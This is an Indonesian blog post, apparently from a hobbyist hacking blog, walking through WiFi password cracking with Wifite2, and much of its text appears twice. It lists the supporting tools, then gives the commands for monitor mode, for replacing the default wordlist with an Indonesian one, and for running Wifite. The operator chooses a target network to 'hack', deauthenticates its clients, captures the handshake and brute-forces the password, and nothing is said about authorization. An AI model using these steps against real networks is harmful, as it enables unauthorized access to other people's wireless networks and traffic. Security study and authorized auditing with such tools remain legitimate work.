Jika sudah masuk ke direktori nya ketik:
:~# ls
:~# chmod +x Wifite.py
FYI chmod berfungsi untuk mempermudah kita menjalankan script, karena untuk menjalankan script pasti pakai bahasa program, tapi kita hanya perlu ketik " ./ " didepannya untuk mempersingkat
C. Pastikan Semuanya siap
Hal yang perlu diperhatikan sebelum melakukan aksi :v
> wireless interface dalam keadaan monitor
kenapa gitu mon? Karena kalo dalam keadaan "managed" atau "auto" ga bakal bisa deteksi wireless disekitar kita, caranya gimana mon?
;~# iwconfig wlan0 mode monitor
Like this:
> ifconfig interface dalam keadaan up
kenapa lagi tuh mon? kalo ifconfig interface dalam keadaan down, ga papa juga, cuma lebih baik di up saja, caranya gimana?
:~# ifconfig <interface> up
karena interface aing wlan0 jadinya
:~# ifconfig wlan0 up
Like this:
> Wordlist
Kalo dari bawaan wifitenya sudah ada wordlist nya, coba kalian "ls" akan ada file yang namanya "wordlist-probable.txt" tapi kalo mau di custom dengan wordlist lain, bisa kalian tumpuk, atau file bawaan di hapus dan diganti dengan wordlist kalian, lusa demon share tentang cara bikin wordlist bikinan sendiri ea :v
Cara modif default wordlist supaya jadi wordlist kita gimana bang?
kalian download dulu wordlist nya disini
bisa melalui git atau zip, kalo zip kalian klik tulisan "clone or download' yang back ground nya hijau dan klik download zip
kalo udah kalian masuk ke folder Downloads kalian
:~# cd /home/usernamekalian/Downloads
karena usernamenya tazmanian jadi gua masuk dgn ketik
:~# cd /home/tazmanian/Downloads
Nah nanti bakal ada file format .zip yang udah kalian install
cara nya kalian ketik:
:~# unzip indonesian-wordlist-master.zip
Like this:
Nah kalian masuk ke folder yang udah kalian unzip
:~# cd indonesian-wordlist-master
Dan kalian ketik "ls" untuk nampilin list, Kalo udah kalian copy ke folder wifite2 yang berada di akses root tadi dengan ketik perintah:
:~# cp 00-indonesian-wordlist.lst /root/wifite2
Lakukan sampai wordlist yang ke enam, lakukan berulang kali lur xixixi dan kalian masuk ke directory wifite2 tadi dan ketikan "ls"
Dan jangan lupa kalian hapus file bawaannya yaitu wordlist-probable.txt dengan perintah:
:~# rm -rf wordlist-probable.txt
Selanjutnya kalian edit nama file dengan perintah:
:~# nano 00-indonesian-wordlist.lst
Dan keluar dengan ketik di Host Key anda Ctrl + X, Save modified buffer? Klik Y Y, file name kalian ubah menjadi "wordlist-probable.txt", save file under different name? klik Y di hostkey
D. Waktunya tempur
Kalian ketik:
:~# ./Wifite.py
tunggu sampai target anda muncul
kalo sudah muncul tekan tombol Ctrl + c di keyboard anda dan pilih nomer target yang mau kalian retas :v disini gua pake essid "tazmanian xploit" dgn nomer 1, jadi gw ketik angka 1
Selanjutnya akan ada 5 tahap, menurut gua 4 tahap yang lainnya ga terlalu penting, yang terpenting adalah tahap ke 5
Like this:
Tahap 5 adalah proses deauth dan saat target memasukkan password akan terekam di layar kita dan akan langsung menjalankan wordlist nya yang sudah diedit tadi, jika client dari Access Point sudah memasukkan password nya, akan otomatis di brute force :v dan result nya:
NB: Kita menggunakan wordlist untuk menebak hasil capture handshake nya, kalo password belom ke crack, anda harus menggunakan wordlist lain sampai benar benar ke crack :v
Sekian dulu dari aing DemonX, kalo ada yang mau ditanyain hubungin DemonX
kalo ada saran atau request silahkan tulis di kolom commentar ya :v
1. About Wifite
Repo ini adalah penulisan ulang lengkap wifite, skrip Python untuk mengaudit jaringan nirkabel.
Wifite menjalankan alat audit nirkabel yang ada untuk Anda. Hentikan menghafal argumen perintah & beralih!
Wifite dirancang untuk menggunakan semua metode yang dikenal untuk mengambil kata sandi dari titik akses nirkabel (router). Metode-metode ini meliputi:
WPS: Serangan Offline Pixie-Dust
WPS: Serangan PIN Brute-Force Online
WPA: Tangkapan Jabat Tangan WPA + celah offline.
WPA: Retakan Hash PMKID + luring offline.
WEP: Berbagai serangan yang diketahui terhadap WEP, termasuk fragmentasi, chop-chop, aireplay, dll.
Jalankan wifite, pilih target Anda, dan Wifite akan secara otomatis mulai mencoba menangkap atau memecahkan kata sandi.
2. Installasi
A. Tools Pendukung
Sebelumnya, kalian harus install beberapa tools dibawah ini sebagai pendukung yang hukumnya fardu ain :v
tshark: Untuk mendeteksi jaringan WPS dan memeriksa file pengambilan jabat tangan.
reaver: Untuk serangan WPS Pixie-Dust & brute-force.
Catatan: Alat cuci Reaver dapat digunakan untuk mendeteksi jaringan WPS jika tshark tidak ditemukan.
bully: Untuk serangan WPS Pixie-Dust & brute-force.
Alternatif untuk Reaver. Tentukan --bully untuk menggunakan Bully, bukan Reaver.
Bully juga digunakan untuk mengambil PSK jika reaver tidak dapat setelah memecahkan PIN WPS.
coWPAtty: Untuk mendeteksi tangkapan jabat tangan.
pyrit: Untuk mendeteksi tangkapan jabat tangan.
hashcat: Untuk memecahkan hash PMKID.
hcxdumptool: Untuk mengambil hash PMKID.
hcxpcaptool: Untuk mengkonversi paket PMKID ke dalam format hashcat.
FYI: Yang belum di install di Kali adalah hcxdumptool dan hcxpcaptool
hcxdumptool: https://github.com/ZerBea/hcxdumptool
hcxpcaptool: https://github.com/ZerBea/hcxtools
Jalankan dengan perintah:
kali@kali:~$ sudo git clone (link diatas) ~tidak sebagai super user (root)
root@localhost:~# git clone (link diatas) ~sebagai super user (root)
B. Install github
Untuk install github nya:
:~# git clone https://github.com/derv82/wifite2
:~# cd wifite2
Jika sudah masuk ke direktori nya ketik:
:~# ls
:~# chmod +x Wifite.py
FYI chmod berfungsi untuk mempermudah kita menjalankan script, karena untuk menjalankan script pasti pakai bahasa program, tapi kita hanya perlu ketik " ./ " didepannya untuk mempersingkat
C. Pastikan Semuanya siap
Hal yang perlu diperhatikan sebelum melakukan aksi :v
> wireless interface dalam keadaan monitor
kenapa gitu mon? Karena kalo dalam keadaan "managed" atau "auto" ga bakal bisa deteksi wireless disekitar kita, caranya gimana mon?
;~# iwconfig wlan0 mode monitor
Like this:
> ifconfig interface dalam keadaan up
kenapa lagi tuh mon? kalo ifconfig interface dalam keadaan down, ga papa juga, cuma lebih baik di up saja, caranya gimana?
:~# ifconfig <interface> up
karena interface aing wlan0 jadinya
:~# ifconfig wlan0 up
Like this:
> Wordlist
Kalo dari bawaan wifitenya sudah ada wordlist nya, coba kalian "ls" akan ada file yang namanya "wordlist-probable.txt" tapi kalo mau di custom dengan wordlist lain, bisa kalian tumpuk, atau file bawaan di hapus dan diganti dengan wordlist kalian, lusa demon share tentang cara bikin wordlist bikinan sendiri ea :v
Cara modif default wordlist supaya jadi wordlist kita gimana bang?
kalian download dulu wordlist nya disini
bisa melalui git atau zip, kalo zip kalian klik tulisan "clone or download' yang back ground nya hijau dan klik download zip
kalo udah kalian masuk ke folder Downloads kalian
:~# cd /home/usernamekalian/Downloads
karena usernamenya tazmanian jadi gua masuk dgn ketik
:~# cd /home/tazmanian/Downloads
Nah nanti bakal ada file format .zip yang udah kalian install
cara nya kalian ketik:
:~# unzip indonesian-wordlist-master.zip
Like this:
Nah kalian masuk ke folder yang udah kalian unzip
:~# cd indonesian-wordlist-master
Dan kalian ketik "ls" untuk nampilin list, Kalo udah kalian copy ke folder wifite2 yang berada di akses root tadi dengan ketik perintah:
:~# cp 00-indonesian-wordlist.lst /root/wifite2
Lakukan sampai wordlist yang ke enam, lakukan berulang kali lur xixixi dan kalian masuk ke directory wifite2 tadi dan ketikan "ls"
Dan jangan lupa kalian hapus file bawaannya yaitu wordlist-probable.txt dengan perintah:
:~# rm -rf wordlist-probable.txt
Selanjutnya kalian edit nama file dengan perintah:
:~# nano 00-indonesian-wordlist.lst
Dan keluar dengan ketik di Host Key anda Ctrl + X, Save modified buffer? Klik Y Y, file name kalian ubah menjadi "wordlist-probable.txt", save file under different name? klik Y di hostkey
D. Waktunya tempur
Kalian ketik:
:~# ./Wifite.py
tunggu sampai target anda muncul
kalo sudah muncul tekan tombol Ctrl + c di keyboard anda dan pilih nomer target yang mau kalian retas :v disini gua pake essid "tazmanian xploit" dgn nomer 1, jadi gw ketik angka 1
Selanjutnya akan ada 5 tahap, menurut gua 4 tahap yang lainnya ga terlalu penting, yang terpenting adalah tahap ke 5
Like this:
Tahap 5 adalah proses deauth dan saat target memasukkan password akan terekam di layar kita dan akan langsung menjalankan wordlist nya yang sudah diedit tadi, jika client dari Access Point sudah memasukkan password nya, akan otomatis di brute force :v dan result nya:
NB: Kita menggunakan wordlist untuk menebak hasil capture handshake nya, kalo password belom ke crack, anda harus menggunakan wordlist lain sampai benar benar ke crack :v
Sekian dulu dari aing DemonX, kalo ada yang mau ditanyain hubungin DemonX
kalo ada saran atau request silahkan tulis di kolom commentar ya :v
Langganan:
Komentar (Atom)
Highlited Post By DemonX
Intip Dunia IT secara Universal
Hello guys ini postingan perdana Demon untuk blogspot, sekarang demon mau basa basi dulu seputar Hacking dan dunia IT. Saat ini kedu...

-
Halo guys, sekarang gua mau share tentang Blue Thunder Tools . Tools ini untuk melacak dan memberikan informasi tentang suatu address....
-
Hello guys ini postingan perdana Demon untuk blogspot, sekarang demon mau basa basi dulu seputar Hacking dan dunia IT. Saat ini kedu...